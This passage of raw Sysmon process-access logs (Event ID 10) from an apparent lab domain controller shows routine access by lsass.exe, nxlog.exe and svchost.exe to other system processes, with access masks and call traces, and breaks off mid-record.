{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.723\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.723","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.801\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.801","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:38.973\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:38.973","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.161\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.161","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.176\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nTargetProcessId: 3084\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.176","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C90200}","TargetProcessId":"3084","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.176\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nTargetProcessId: 3084\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.176","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C90200}","TargetProcessId":"3084","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.176\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.176","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.192\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 